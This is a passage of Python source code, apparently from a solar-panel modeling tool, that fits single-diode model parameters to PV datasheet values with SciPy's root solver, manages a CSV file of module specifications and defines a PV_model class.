I=Imp and V=Vmp\n Eq 4: dP/dV=0 with I=Imp and V=Vmp\n Eq 5: dI/dV = -1/Rsh with I=Isc and V=0\n\n The first three are very straightforward. The fourth and fifth\n require using implicit differentiation (see\n https://en.wikipedia.org/wiki/Implicit_function) to find the\n derivative of the single-diode equation, with I being the\n differentiation variable and V being the dependent variable. See\n the design document for more details on this math.\n\n This function is used for determining the five parameter values\n given known voltage and current values at the Voc, Isc, and\n maximum power points. The function is intended to be passed to\n the SciPy root solver, which repeatedly calls it using\n progressively better guesses for the five parameters until it has\n identified values that result in all five return values being\n sufficiently close to zero.\n\n In some cases, a good solution cannot be found that satisfies all\n five equations. This may be due to flawed datasheet values. The\n last entry in the voc_isc_vmp_imp_ignore_eq4 list is a flag that,\n when True, causes the 4th equation to be ignored. This is done by\n forcing its return value to zero. In this case the resulting\n curve will \"hit\" all three points (Isc, Voc, MPP). But the \"MPP\"\n won't necessarily be the point with the maximum power on that\n curve.\n\n The test_first_four_parms function is called to determine the\n results of the first four equations, and then the test_eq5\n function is called to determine the result of the fifth.\n \"\"\"\n # The caller passes the test values for IL, I0, A, Rs, and Rsh in a\n # numpy array (a simple list works too though).\n il, i0, a, rs, rsh = il_i0_a_rs_rsh\n\n # Steer away from negative numbers\n if i0 < 0 or a < 0 or rs < 0 or rsh <= 0:\n return [999, 999, 999, 999, 999]\n\n # Equation #1 - #4: call test_first_four_parms function\n il_i0_a_rs = [il, i0, a, rs]\n rsh_voc_isc_vmp_imp_ignore_eq4 = [rsh] + voc_isc_vmp_imp_ignore_eq4\n (eq1_result,\n eq2_result,\n eq3_result,\n eq4_result) = test_first_four_parms(il_i0_a_rs,\n rsh_voc_isc_vmp_imp_ignore_eq4)\n\n # Equation #5 is the Isc slope equation. It equals zero if the slope\n # of the curve at the Isc point is equal to -1/Rsh, i.e.:\n #\n # dI/dV = -1/Rsh @ I=Isc, V=0\n #\n # dI/dV is the derivative of the single-diode equation, with I being\n # the differentiation variable and V being the dependent variable.\n # The test_eq5 function implements equation #5.\n #\n isc = voc_isc_vmp_imp_ignore_eq4[1]\n eq5_result = test_eq5(rsh, [i0, a, rs, isc])\n return [eq1_result, eq2_result, eq3_result, eq4_result, eq5_result]\n\n\ndef test_first_four_parms(il_i0_a_rs, rsh_voc_isc_vmp_imp_ignore_eq4):\n \"\"\"Function to test the four parameter values (IL, I0, A, and Rs), given\n the Rsh value and the Voc, Isc, Vmp and Imp values from the\n curve.\n\n Only the first four equations are considered for this function.\n In some cases, the root solver is able to find a solution given a\n fixed value for Rsh (and relieved of having to satisfy equation\n #5) when it otherwise fails if it is asked to solve all five\n equations for all five parameters. Having a separate function for\n the first four equations/parameters makes it possible to invoke\n the root solver in this way as a fallback.\n\n See the test_parms docstring for more details.\n \"\"\"\n # pylint: disable=too-many-locals\n\n # The caller passes the test values for IL, I0, A, and Rs in a\n # numpy array (a simple list works too though).\n il, i0, a, rs = il_i0_a_rs\n\n # Steer away from negative numbers\n if i0 < 0 or a < 0 or rs < 0:\n return [999, 999, 999, 999]\n\n # The the Rsh, Voc, Isc, Vmp and Imp values and the flag to ignore\n # equation 4 are passed in the args list.\n rsh, voc, isc, vmp, imp, ignore_eq4 = rsh_voc_isc_vmp_imp_ignore_eq4\n\n # Create some combo lists\n il_i0_a_rsh = [il, i0, a, rsh]\n il_i0_a_rs_rsh = [il, i0, a, rs, rsh]\n i0_a_rs_rsh = [i0, a, rs, rsh]\n vmp_imp = [vmp, imp]\n\n # Equation #1: Voc equation\n #\n # This equals zero if the curve hits the Voc point. It is just\n # the single-diode equation with V=Voc and I=0.\n #\n # The test_voc function implements equation #1.\n #\n eq1_result = test_voc(voc, il_i0_a_rsh)\n\n # Equation #2: Isc equation\n #\n # This equals zero if the curve hits the Isc point. It is just\n # the single-diode equation with I=Isc and V=0.\n #\n # The test_isc function implements equation #2.\n #\n eq2_result = test_isc(isc, il_i0_a_rs_rsh)\n\n # Equations #3 and #4: MPP equations\n #\n # Equation #3 equals zero if the curve hits the MPP. It is just the\n # single-diode equation with V=Vmp and I=Imp. It does not, by\n # itself guarantee that this point is in fact the point with the\n # maximum power.\n #\n # The test_eq3 function implements equation #3.\n #\n eq3_result = test_eq3(vmp_imp, il_i0_a_rs_rsh)\n\n # Equation #4 is the MPP power equation (dP/dV = 0). It equals zero\n # if the point at V=Vmp and I=Imp is the point with the highest\n # power. At the MPP, dP/dV = Imp + Vmp * dI/dV. dI/dV is the\n # derivative of the single-diode equation, with I being the\n # differentiation variable and V being the dependent variable.\n #\n # The test_eq4 function implements equation #4.\n #\n eq4_result = test_eq4(vmp_imp, i0_a_rs_rsh) if not ignore_eq4 else 0.0\n\n return [eq1_result, eq2_result, eq3_result, eq4_result]\n\n\ndef find_parms(voc_isc_vmp_imp, il_guess, i0_guesses, a_guess, rs_guesses,\n rsh_guesses, err_thresh):\n \"\"\"Function to use the SciPy root solver to find the values of the IL,\n I0, A, Rs and Rsh parameters.\n\n The root solver's success depends heavily on being provided with\n \"good\" guesses for the values it is solving for. Surprisingly,\n guesses that are closest to the final solution value are not\n always the best.\n\n This function takes the following as inputs:\n\n - Voc, Isc, Vmp, Imp\n - A single guess for IL (usually equal to Isc)\n - A list of guesses for I0\n - A single guess for A\n - A list of guesses for Rs\n - A list of guesses for Rsh\n\n It then loops, calling the root solver with the different\n combinations of guesses. Since this can be time-consuming, it\n declares success and terminates if a solution is found that is\n \"good enough\". It is \"good enough\" if none of the equations has\n an absolute value greater than err_thresh. Performance is\n optimized if the guesses are ordered from most to least likely to\n succeed.\n\n The outermost loop first tries all the inner loops with\n ignore_eq4 set to False. The second-to-outermost loop first tries\n all the inner loops with use_eq5 set to True. Ideally, a solution\n is found before either of these loops repeats, meaning all five\n equations are satisfied within a margin of err_thresh. If not,\n then the the second-to-outermost loop sets use_eq5 to False,\n which causes the innermost loop to run the root solver only for\n the first four equations (and with the exact values for Rsh from\n the guesses list. If that too fails, then the outermost loop sets\n ignore_eq4 to True, which causes the root solver to be \"fooled\"\n into thinking that equation #4 is always satified. This results\n in an imperfect modeling, but usually better than nothing.\n \"\"\"\n # pylint: disable=too-many-arguments\n # pylint: disable=too-many-locals\n # pylint: disable=too-many-nested-blocks\n voc, isc, vmp, imp = voc_isc_vmp_imp\n best_max_abs_err = 999999999\n for ignore_eq4 in [False, True]:\n for use_eq5 in [True, False]:\n for rsh_guess in rsh_guesses:\n for i0_guess in i0_guesses:\n for rs_guess in rs_guesses:\n with warnings.catch_warnings():\n # Suppress printing annoying messages for cases\n # that aren't working out\n filter_str = \"The iteration is not making \"\n filter_str += \"good progress\"\n warnings.filterwarnings(\"ignore\", filter_str,\n RuntimeWarning)\n filter_str = \"The number of calls to function has \"\n filter_str += \"reached maxfev\"\n warnings.filterwarnings(\"ignore\", filter_str,\n RuntimeWarning)\n if use_eq5:\n # Run SciPy root solver, using\n # test_parms function with guesses for\n # all five parameters and specified\n # values for Voc, isc, vmp and imp\n guesses = [il_guess, i0_guess, a_guess,\n rs_guess, rsh_guess]\n sol = root(test_parms, guesses,\n args=[voc, isc, vmp, imp,\n ignore_eq4])\n else:\n # Run SciPy root solver, using\n # test_first_four_parms function with\n # guesses for first four parameters and\n # specified values for rsh, Voc, isc,\n # vmp and imp\n guesses = [il_guess, i0_guess, a_guess,\n rs_guess]\n sol = root(test_first_four_parms, guesses,\n args=[rsh_guess, voc, isc, vmp, imp,\n ignore_eq4])\n solutions = sol.x\n results = sol.fun\n\n # Find worst error in results\n worst_abs_err = 0\n for res in results:\n worst_abs_err = (abs(res)\n if abs(res) > worst_abs_err\n else worst_abs_err)\n\n # If that's the best so far, update best_parms\n # and best_results\n if worst_abs_err < best_max_abs_err:\n best_parms = (solutions if use_eq5\n else np.append(solutions, rsh_guess))\n best_max_abs_err = worst_abs_err\n best_results = results\n\n # If it's less than err_thresh, we are\n # done. Return the parameters and results\n if worst_abs_err < err_thresh:\n return [best_parms, best_results]\n\n # If no results met the err_thresh criterion, return the best\n # results seen\n return [best_parms, best_results]\n\n\ndef pv_spec_from_dict(pv_spec_dict):\n \"\"\"Global function to extract the values from a pv_spec_dict and return\n them in the canonical order. All values are strings, so need to\n convert to ints/floats (and those that fail remain strings)\n \"\"\"\n pv_spec = []\n for field in SPEC_FIELDS:\n try:\n value = int(pv_spec_dict[field])\n except ValueError:\n try:\n value = float(pv_spec_dict[field])\n except ValueError:\n value = pv_spec_dict[field]\n pv_spec.append(value)\n return pv_spec\n\n\ndef read_pv_specs(pv_spec_csv_file):\n \"\"\"Global generator function to read a PV spec CSV file and yield each\n spec as a dict.\n \"\"\"\n with open(pv_spec_csv_file, encoding=\"utf-8\") as csvfile:\n reader = csv.DictReader(csvfile)\n assert_str = \"ERROR: first row of {} does not contain \"\n assert_str += \"the expected values: {}\"\n assert sorted(reader.fieldnames) == sorted(SPEC_FIELDS), \\\n assert_str.format(pv_spec_csv_file, SPEC_FIELDS)\n for pv_spec_dict in reader:\n pv_spec = pv_spec_from_dict(pv_spec_dict)\n check_pv_spec(pv_spec)\n yield pv_spec_dict\n\n\ndef add_pv_spec(pv_spec_csv_file, pv_spec):\n \"\"\"Global function to add the spec values for a PV module or cell to the\n PV spec CSV file. If the file does not exist, it is created. If\n it does exist, the current entries are read and the file is\n overwritten with the same values, with the new entry added in the\n correct place (list sorted alphabetically by PV name). If the\n file already had an entry with the same PV name as the one being\n added, the old one is discarded and replaced by the new one.\n \"\"\"\n check_pv_spec(pv_spec)\n # Create a dict from the spec values and the field names\n pv_spec_dict = dict(zip(SPEC_FIELDS, pv_spec))\n # Start the (unordered) list of specs with the new one\n pv_specs = [pv_spec_dict]\n if os.path.exists(pv_spec_csv_file):\n for old_pv_spec_dict in read_pv_specs(pv_spec_csv_file):\n # Add to list unless its name is the same as the one being\n # added\n if old_pv_spec_dict[\"PV Name\"] != pv_spec_dict[\"PV Name\"]:\n pv_specs.append(old_pv_spec_dict)\n\n with open(pv_spec_csv_file, \"w+\", encoding=\"utf-8\") as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=SPEC_FIELDS)\n writer.writeheader()\n for new_pv_spec_dict in sorted(pv_specs, key=lambda k: k[\"PV Name\"]):\n writer.writerow(new_pv_spec_dict)\n\n\ndef check_pv_spec(pv_spec):\n \"\"\"Global function to check the fields in a PV spec list to make\n sure they are legal.\n \"\"\"\n assert_lead = \"ERROR: \"\n # Voc, Isc, Vmp, Imp, and Isc temp coeff must all be positive\n # floating point or integer values\n for field in [SPEC_FIELDS.index(\"Voc\"),\n SPEC_FIELDS.index(\"Isc\"),\n SPEC_FIELDS.index(\"Vmp\"),\n SPEC_FIELDS.index(\"Imp\"),\n SPEC_FIELDS.index(\"Isc temp coeff\")]:\n assert isinstance(pv_spec[field], (int, float)), \\\n (\"{} Invalid {} value ({}). Must be floating point or integer.\"\n .format(assert_lead, SPEC_FIELDS[field], pv_spec[field]))\n assert pv_spec[field] > 0, \\\n (\"{} Invalid {} value ({}). Must be positive.\"\n .format(assert_lead, SPEC_FIELDS[field], pv_spec[field]))\n\n # Cells and NOCT must be positive floating point or integer values\n # OR and empty string\n for field in [SPEC_FIELDS.index(\"Cells\"),\n SPEC_FIELDS.index(\"NOCT\")]:\n if pv_spec[field] != \"\":\n assert_str = \"{} Invalid {} value ({}).\"\n assert_str += \" Must be floating point, integer or\"\n assert_str += \" empty string (if unknown).\"\n assert isinstance(pv_spec[field], (int, float)), \\\n (assert_str.format(assert_lead, SPEC_FIELDS[field],\n pv_spec[field]))\n assert pv_spec[field] > 0, \\\n (\"{} Invalid {} value ({}). Must be positive.\"\n .format(assert_lead, SPEC_FIELDS[field], pv_spec[field]))\n\n # Voc and MPP temp coeff must be negative floating point or integer\n # values\n for field in [SPEC_FIELDS.index(\"Voc temp coeff\"),\n SPEC_FIELDS.index(\"MPP temp coeff\")]:\n assert isinstance(pv_spec[field], (int, float)), \\\n (\"{} Invalid {} value ({}). Must be floating point or integer.\"\n .format(assert_lead, SPEC_FIELDS[field], pv_spec[field]))\n assert pv_spec[field] < 0, \\\n (\"{} Invalid {} value ({}). Must be negative.\"\n .format(assert_lead, SPEC_FIELDS[field], pv_spec[field]))\n\n # Voc temp coeff units must be \"%\" or \"mV\"\n field = SPEC_FIELDS.index(\"Voc temp coeff units\")\n assert pv_spec[field] in [\"%\", \"mV\"], \\\n (\"{} Invalid {} value ({}). Must be % or mV.\"\n .format(assert_lead, SPEC_FIELDS[field], pv_spec[field]))\n\n # Isc temp coeff units must be \"%\" or \"mA\"\n field = SPEC_FIELDS.index(\"Isc temp coeff units\")\n assert pv_spec[field] in [\"%\", \"mA\"], \\\n (\"{} Invalid {} value ({}). Must be % or mA.\"\n .format(assert_lead, SPEC_FIELDS[field], pv_spec[field]))\n\n # MPP temp coeff units must be \"%\"\n field = SPEC_FIELDS.index(\"MPP temp coeff units\")\n assert pv_spec[field] in [\"%\"], \\\n (\"{} Invalid {} value ({}). Must be %.\"\n .format(assert_lead, SPEC_FIELDS[field], pv_spec[field]))\n\n\ndef create_pv_spec_file(pv_spec_csv_file):\n \"\"\"Global function to create a starting PV spec CSV file populated with\n some example PV module specifications.\n \"\"\"\n pv_specs = []\n pv_specs.append([\"SunPower X21-345\", 68.2, 6.39, 57.3, 6.02,\n 96, -167.4, \"mV\", 2.9, \"mA\", -0.29, \"%\", 41.5])\n pv_specs.append([\"REC TwinPeak REC280TP\", 39.2, 9.44, 31.9, 8.78,\n 60, -0.31, \"%\", 0.045, \"%\", -0.39, \"%\", 44.6])\n pv_specs.append([\"Grape Solar GS-STAR-100W\", 21.9, 6.13, 18.0, 5.56,\n 36, -0.32, \"%\", 0.04, \"%\", -0.45, \"%\", 45.0])\n pv_specs.append([\"Jingko JKM370M-66HB\", 43.7, 10.73, 36.93, 10.02,\n 66, -0.28, \"%\", 0.048, \"%\", -0.35, \"%\", 45.0])\n pv_specs.append([\"Canadian Solar CS3W-415P\", 47.8, 11.14, 39.3, 10.56,\n 72, -0.29, \"%\", 0.05, \"%\", -0.37, \"%\", 42.0])\n pv_specs.append([\"Silfab SIL-380 NT\", 48.0, 10.3, 39.3, 9.7,\n 72, -0.3, \"%\", 0.03, \"%\", -0.38, \"%\", 45.0])\n pv_specs.append([\"Renogy RNG-160D-SS\", 22.9, 8.37, 20.2, 7.92,\n 32, -0.31, \"%\", 0.05, \"%\", -0.42, \"%\", 47.0])\n pv_specs.append([\"Q.PEAK DUO-G5 330\", 40.66, 10.20, 33.98, 9.71,\n 60, -0.28, \"%\", 0.04, \"%\", -0.37, \"%\", 45.0])\n pv_specs.append([\"SunPower SPR-A450-COM\", 51.9, 11.0, 44.0, 10.2,\n 72, -136.0, \"mV\", 5.7, \"mA\", -0.29, \"%\", \"\"])\n pv_specs.append([\"HQST HQST-150P\", 22.7, 8.09, 19.1, 7.89,\n 32, -0.30, \"%\", 0.06, \"%\", -0.40, \"%\", 47.0])\n pv_specs.append([\"JA Solar JAM60D09-325/BP\", 41.05, 10.16, 33.75, 9.63,\n 60, -0.3, \"%\", 0.06, \"%\", -0.37, \"%\", 45.0])\n pv_specs.append([\"Trina Solar TSM-DD05H.05(II) 320\",\n 40.6, 10.0, 33.3, 9.6,\n 60, -0.29, \"%\", 0.05, \"%\", -0.37, \"%\", 44.0])\n pv_specs.append([\"Longi LR6-72HPH-385M\", 49.2, 10.03, 40.8, 9.43,\n 72, -0.286, \"%\", 0.057, \"%\", -0.37, \"%\", 45.0])\n pv_specs.append([\"Risen Energy RSM72-6-385BMDG\",\n 45.40, 8.24, 37.10, 7.75,\n 72, -0.29, \"%\", 0.05, \"%\", -0.39, \"%\", 45.0])\n pv_specs.append([\"Risen Energy Poly 156mm cell 4.29W\",\n 0.632, 8.668, 0.526, 8.156,\n 1, -0.32, \"%\", 0.06, \"%\", -0.44, \"%\", \"\"])\n pv_specs.append([\"GCL-SI GCL-M3/72H-405\", 49.23, 10.39, 40.96, 9.89,\n 72, -0.3, \"%\", 0.06, \"%\", -0.39, \"%\", 44.0])\n pv_specs.append([\"Talesun Hipro M350\", 47.4, 9.5, 39.3, 8.92,\n 72, -0.3, \"%\", 0.05, \"%\", -0.39, \"%\", 45.0])\n pv_specs.append([\"LG LG350Q1C-A5\", 42.7, 10.77, 36.1, 9.70,\n 60, -0.24, \"%\", 0.04, \"%\", -0.30, \"%\", 44.0])\n pv_specs.append([\"Panasonic VBH340RA18N\", 71.2, 6.02, 60.3, 5.64,\n 96, -170.0, \"mV\", 3.31, \"mA\", -0.258, \"%\", 44.0])\n pv_specs.append([\"Hyundai HiS-S375RI\", 48.0, 10.0, 39.7, 9.4,\n 72, -0.29, \"%\", 0.039, \"%\", -0.40, \"%\", 46.0])\n pv_specs.append([\"ZZZ CANNOT BE MODELED\", 30.6, 10.0, 33.3, 9.6,\n 60, -0.29, \"%\", 0.05, \"%\", -0.37, \"%\", 44.0])\n for pv_spec in pv_specs:\n add_pv_spec(pv_spec_csv_file, pv_spec)\n\n\n#################\n# Classes #\n#################\n\nclass PV_model():\n \"\"\"Class that models a PV cell or module, given its datasheet\n specifications. Methods are provided to generate the PV's\n single-diode model parameters at a given cell temperature and\n irradiance and to generate the IV curve at those conditions.\n \"\"\"\n # pylint: disable=too-many-instance-attributes\n # pylint: disable=too-many-public-methods\n\n def __init__(self):\n self.debug = False\n self.vi_points = []\n self.run_ms = 0\n # Property variables\n self._pv_name = None\n self._voc_stc = None\n self._isc_stc = None\n self._vmp_stc = None\n self._imp_stc = None\n self._num_cells = None\n self._voc_temp_coeff_pct_per_deg = None\n self._isc_temp_coeff_pct_per_deg = None\n self._mpp_temp_coeff_pct_per_deg = None\n self._noct = None\n self._i0_guesses = DEFAULT_I0_GUESSES\n self._rs_guesses = DEFAULT_RS_GUESSES\n self._rsh_guesses = DEFAULT_RSH_GUESSES\n self._err_thresh = DEFAULT_ERR_THRESH\n self._irradiance = STC_IRRAD\n self._cell_temp_c = STC_T_C\n self._il = None\n self._i0 = None\n self._a = None\n self._rs = None\n self._rsh = None\n self._vmp = None\n self._imp = None\n self._eq1_result = None\n self._eq2_result = None\n self._eq3_result = None\n self._eq4_result = None\n self._eq5_result = None\n\n # Properties\n # ---------------------------------\n @property\n def pv_name(self):\n \"\"\"Name of PV module or cell\n \"\"\"\n return self._pv_name\n\n @pv_name.setter\n def pv_name(self, value):\n self._pv_name = value\n\n # ---------------------------------\n @property\n def voc_stc(self):\n \"\"\"Open-circuit voltage at standard test conditions (from datasheet)\n \"\"\"\n return self._voc_stc\n\n @voc_stc.setter\n def voc_stc(self, value):\n self._voc_stc = value\n\n # ---------------------------------\n @property\n def isc_stc(self):\n \"\"\"Short-circuit current at standard test conditions (from datasheet)\n \"\"\"\n return self._isc_stc\n\n @isc_stc.setter\n def isc_stc(self, value):\n self._isc_stc = value\n\n # ---------------------------------\n @property\n def vmp_stc(self):\n \"\"\"Maximum power point voltage at standard test conditions (from\n datasheet)\n \"\"\"\n return self._vmp_stc\n\n @vmp_stc.setter\n def vmp_stc(self, value):\n self._vmp_stc = value\n\n # ---------------------------------\n @property\n def imp_stc(self):\n \"\"\"Maximum power point current at standard test conditions (from\n datasheet)\n \"\"\"\n return self._imp_stc\n\n @imp_stc.setter\n def imp_stc(self, value):\n self._imp_stc = value\n\n # ---------------------------------\n @property\n def num_cells(self):\n \"\"\"Number of PV cells\n \"\"\"\n return self._num_cells\n\n @num_cells.setter\n def num_cells(self, value):\n self._num_cells = value\n\n # ---------------------------------\n @property\n def voc_temp_coeff_pct_per_deg(self):\n \"\"\"Voc temperature coefficient (%/K)\n \"\"\"\n return self._voc_temp_coeff_pct_per_deg\n\n @voc_temp_coeff_pct_per_deg.setter\n def voc_temp_coeff_pct_per_deg(self, value):\n self._voc_temp_coeff_pct_per_deg = value\n\n # ---------------------------------\n @property\n def isc_temp_coeff_pct_per_deg(self):\n \"\"\"Isc temperature coefficient (%/K)\n \"\"\"\n return self._isc_temp_coeff_pct_per_deg\n\n @isc_temp_coeff_pct_per_deg.setter\n def isc_temp_coeff_pct_per_deg(self, value):\n self._isc_temp_coeff_pct_per_deg = value\n\n # ---------------------------------\n @property\n def mpp_temp_coeff_pct_per_deg(self):\n \"\"\"MPP temperature coefficient (%/K)\n \"\"\"\n return self._mpp_temp_coeff_pct_per_deg\n\n @mpp_temp_coeff_pct_per_deg.setter\n def mpp_temp_coeff_pct_per_deg(self, value):\n self._mpp_temp_coeff_pct_per_deg = value\n\n # ---------------------------------\n @property\n def noct(self):\n \"\"\"Nominal operating cell temperature (degrees C)\n \"\"\"\n return self._noct\n\n @noct.setter\n def noct(self, value):\n self._noct = value\n\n # ---------------------------------\n @property\n def i0_guesses(self):\n \"\"\"List of guesses for the I0 parameter to try with the SciPy root\n solver\n \"\"\"\n return self._i0_guesses\n\n @i0_guesses.setter\n def i0_guesses(self, value):\n self._i0_guesses = value\n\n # ---------------------------------\n @property\n def rs_guesses(self):\n \"\"\"List of guesses for the Rs parameter to try with the SciPy root\n solver\n \"\"\"\n return self._rs_guesses\n\n @rs_guesses.setter\n def rs_guesses(self, value):\n self._rs_guesses = value\n\n # ---------------------------------\n @property\n def rsh_guesses(self):\n \"\"\"List of guesses for the Rsh parameter to try with the SciPy root\n solver\n \"\"\"\n return self._rsh_guesses\n\n @rsh_guesses.setter\n def rsh_guesses(self, value):\n self._rsh_guesses = value\n\n # ---------------------------------\n @property\n def err_thresh(self):\n \"\"\"Error threshold for the SciPy root solver results. A perfect solution\n returns 0. This threshold is the maximum absolute value that\n will be considered \"good enough\" for each of the results of\n the four equations in order to consider the solution a match.\n \"\"\"\n return self._err_thresh\n\n @err_thresh.setter\n def err_thresh(self, value):\n self._err_thresh = value\n\n # ---------------------------------\n @property\n def irradiance(self):\n \"\"\"Irradiance value in W/m^2 to model. Default is STC value of 1000.0\n \"\"\"\n return self._irradiance\n\n @irradiance.setter\n def irradiance(self, value):\n self._irradiance = value\n\n # ---------------------------------\n @property\n def cell_temp_c(self):\n \"\"\"Cell temperature (in degrees C) to model. Default is STC value of\n 25.0\n \"\"\"\n return self._cell_temp_c\n\n @cell_temp_c.setter\n def cell_temp_c(self, value):\n self._cell_temp_c = value\n\n # ---------------------------------\n @property\n def il(self):\n \"\"\"Value of single-diode model IL parameter\n \"\"\"\n return self._il\n\n @il.setter\n def il(self, value):\n self._il = value\n\n # ---------------------------------\n @property\n def i0(self):\n \"\"\"Value of single-diode model I0 parameter\n \"\"\"\n return self._i0\n\n @i0.setter\n def i0(self, value):\n self._i0 = value\n\n # ---------------------------------\n @property\n def a(self):\n \"\"\"Value of single-diode model A parameter\n \"\"\"\n return self._a\n\n @a.setter\n def a(self, value):\n self._a = value\n\n # ---------------------------------\n @property\n def rs(self):\n \"\"\"Value of single-diode model Rs parameter\n \"\"\"\n return self._rs\n\n @rs.setter\n def rs(self, value):\n self._rs = value\n\n # ---------------------------------\n @property\n def rsh(self):\n \"\"\"Value of single-diode model Rsh parameter\n \"\"\"\n return self._rsh\n\n @rsh.setter\n def rsh(self, value):\n self._rsh = value\n\n # ---------------------------------\n @property\n def vmp(self):\n \"\"\"Value of the MPP voltage\n \"\"\"\n return self._vmp\n\n @vmp.setter\n def vmp(self, value):\n self._vmp = value\n\n # ---------------------------------\n @property\n def imp(self):\n \"\"\"Value of the MPP current\n \"\"\"\n return self._imp\n\n @imp.setter\n def imp(self, value):\n self._imp = value\n\n # ---------------------------------\n @property\n def eq1_result(self):\n \"\"\"Result of equation #1 (Step #1)\"\"\"\n return self._eq1_result\n\n @eq1_result.setter\n def eq1_result(self, value):\n self._eq1_result = value\n\n # ---------------------------------\n @property\n def eq2_result(self):\n \"\"\"Result of equation #2 (Step #1)\"\"\"\n return self._eq2_result\n\n @eq2_result.setter\n def eq2_result(self, value):\n self._eq2_result = value\n\n # ---------------------------------\n @property\n def eq3_result(self):\n \"\"\"Result of equation #3 (Step #1)\"\"\"\n return self._eq3_result\n\n @eq3_result.setter\n def eq3_result(self, value):\n self._eq3_result = value\n\n # ---------------------------------\n @property\n def eq4_result(self):\n \"\"\"Result of equation #4 (Step #1)\"\"\"\n return self._eq4_result\n\n @eq4_result.setter\n def eq4_result(self, value):\n self._eq4_result = value\n\n # ---------------------------------\n @property\n def eq5_result(self):\n \"\"\"Result of equation #5 (Step #1)\"\"\"\n return self._eq5_result\n\n @eq5_result.setter\n def eq5_result(self, value):\n self._eq5_result = value\n\n # Derived properties\n # ---------------------------------\n def voc_temp_coeff_mv_per_deg(self, value):\n \"\"\"Voc temperature coefficient (mV/K) - Setter only\n Translated to %/K and sets that property.\n \"\"\"\n # pylint: disable=method-hidden\n self._voc_temp_coeff_pct_per_deg = (value/10.0)/self.voc_stc\n voc_temp_coeff_mv_per_deg = property(None, voc_temp_coeff_mv_per_deg)\n\n # ---------------------------------\n def isc_temp_coeff_ma_per_deg(self, value):\n \"\"\"Isc temperature coefficient (mA/K) - Setter only\n Translated to %/K and sets that property.\n \"\"\"\n # pylint: disable=method-hidden\n self._isc_temp_coeff_pct_per_deg = (value/10.0)/self.isc_stc\n isc_temp_coeff_ma_per_deg = property(None, isc_temp_coeff_ma_per_deg)\n\n # ---------------------------------\n @property\n def a_guess(self):\n \"\"\"Guess for A parameter for root solver\"\"\"\n num_cells = (self.num_cells if self.num_cells is not None else\n round(self.voc_stc / CELL_VOC_GUESS))\n kt_over_q = BOLTZMANN_K * self.cell_temp_k / ELECTRON_CHG_Q\n return IDEALITY_FACTOR_GUESS * num_cells * kt_over_q\n\n # ---------------------------------\n @property\n def cell_temp_k(self):\n \"\"\"Cell temperature (in K)\n \"\"\"\n return self.cell_temp_c + TEMP_K_0_DEG_C\n\n # ---------------------------------\n @property\n def temp_diff_from_stc(self):\n \"\"\"Difference between cell_temp_c and the standard test conditions\n temperature\n \"\"\"\n return self.cell_temp_c - STC_T_C\n\n # ---------------------------------\n @property\n def isc_at_temp(self):\n \"\"\"Calculated Isc value at cell_temp_c at STC irradiance\"\"\"\n isc_at_temp = (self.isc_stc * (1.0 + self.temp_diff_from_stc *\n self.isc_temp_coeff_pct_per_deg/100.0))\n return isc_at_temp\n\n # ---------------------------------\n @property\n def voc_at_temp(self):\n \"\"\"Calculated Voc value at cell_temp_c at STC irradiance\"\"\"\n voc_at_temp = (self.voc_stc * (1.0 + self.temp_diff_from_stc *\n self.voc_temp_coeff_pct_per_deg/100.0))\n return voc_at_temp\n\n # ---------------------------------\n @property\n def imp_at_temp(self):\n \"\"\"Calculated Imp value at cell_temp_c at STC irradiance. We assume\n that the Imp scales with the Isc temperature coefficient.\n This may not be exactly true, but it's close.\n \"\"\"\n imp_at_temp = (self.imp_stc * (1.0 + self.temp_diff_from_stc *\n self.isc_temp_coeff_pct_per_deg/100.0))\n return imp_at_temp\n\n # ---------------------------------\n @property\n def vmp_at_temp(self):\n \"\"\"Calculated Vmp value at cell_temp_c at STC irradiance. This is a\n two-step process. First we calculate the MPP power using the\n power temperature coefficient. Then we use the estimated Imp\n value to calculate the Vmp value that results in the\n calculated power.\n \"\"\"\n pwr_at_temp = (self.imp_stc * self.vmp_stc *\n (1.0 + self.temp_diff_from_stc *\n self.mpp_temp_coeff_pct_per_deg/100.0))\n vmp_at_temp = pwr_at_temp / self.imp_at_temp\n return vmp_at_temp\n\n # ---------------------------------\n @property\n def voc(self):\n \"\"\"Voc of IV curve for the PV module/cell at the specified temperature\n and irradiance.\n \"\"\"\n if (self.il is None or self.i0 is None or\n self.a is None or self.rsh is None):\n return None\n voc_guess = self.voc_at_temp\n voc = root(test_voc, x0=[voc_guess], args=([self.il, self.i0, self.a,\n self.rsh]))\n return voc.x[0]\n\n # ---------------------------------\n @property\n def isc(self):\n \"\"\"Isc of IV curve for the PV module/cell at the specified temperature\n and irradiance.\n \"\"\"\n if (self.il is None or self.i0 is None or\n self.a is None or self.rs is None or self.rsh is None):\n return None\n isc_guess = self.isc_at_temp\n isc = root(test_isc, x0=[isc_guess], args=([self.il, self.i0, self.a,\n self.rs, self.rsh]))\n return isc.x[0]\n\n # ---------------------------------\n @property\n def ideality_factor(self):\n \"\"\"Value of the ideality factor \"n\". This is approximate if the\n number of cells is not specified.\n \"\"\"\n num_cells = (self.num_cells if self.num_cells is not None else\n round(self.voc_stc / CELL_VOC_GUESS))\n return self.a / (num_cells * BOLTZMANN_K * self.cell_temp_k /\n ELECTRON_CHG_Q)\n\n # ---------------------------------\n @property\n def parms_string(self):\n \"\"\"String with the single-diode equations parameter values\n \"\"\"\n return \"IL: {} I0: {} A: {} Rs: {} Rsh: {}\".format(self.il,\n self.i0,\n self.a,\n self.rs,\n self.rsh)\n\n # ---------------------------------\n @property\n def parms_string_w_newlines(self):\n \"\"\"String with the single-diode equations parameter values\n \"\"\"\n return \"IL: {}\\nI0: {}\\nA: {}\\nRs: {}\\nRsh: {}\".format(self.il,\n self.i0,\n self.a,\n self.rs,\n self.rsh)\n\n # ---------------------------------\n @property\n def title_string(self):\n \"\"\"String with the PV name, irradiance and cell temperature.\n \"\"\"\n sqd = '\\xb2'\n dgs = '\\N{DEGREE SIGN}'\n return (\"{} modeled @ {} W/m{}, {} {}C cell temp\"\n .format(self.pv_name, self.irradiance, sqd,\n self.cell_temp_c, dgs))\n\n # ---------------------------------\n @property\n def summary_string(self):\n \"\"\"String with the PV name, irradiance, cell temperature and modeled\n Voc, Isc, Vmp, Imp and max power.\n \"\"\"\n max_power = self.vmp * self.imp if self.vmp is not None else None\n str1 = \"Voc: {} V Isc: {} A \".format(self.voc, self.isc)\n str2 = \"MPP: {} V {} A {} W\".format(self.vmp, self.imp, max_power)\n return \"{}\\n{}\\n{}\".format(self.title_string, str1, str2)\n\n # Methods\n # -------------------------------------------------------------------------\n def get_spec_vals(self, pv_name, pv_spec_csv_file):\n 